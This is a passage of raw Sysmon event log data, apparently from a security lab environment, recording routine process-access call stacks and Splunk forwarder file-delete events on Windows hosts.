Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+37578|C:\Windows\System32\TwinUI.dll+37498|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+375e0|C:\Windows\System32\TwinUI.dll+37485|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:43.180{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFE6D5E62B9597D2A2B11FA7097C0AA0,SHA256=32FED872F9FD78E34CF663234803E4ED4C67FCB72CC8A5FE7325B8DF0A4F5309,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.867{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.863{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.863{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\com
base.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.838{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.838{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.735{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.734{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.734{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.734{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001048477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.721{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58A8B725A5EDB119E11B237DC953198C,SHA256=DDBE60D8FE2103D71515ACFA1DA23A62A035A11CAA19F56F31F8E04130C1C406,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.705{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=38F80956A64CF089AD0933427D7705C7,SHA256=E3D4765BBC78EF0C4B812AE494DF8E3C5B6A82DADBC3BB379387ED9CA10C1A20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.677{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.677{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\W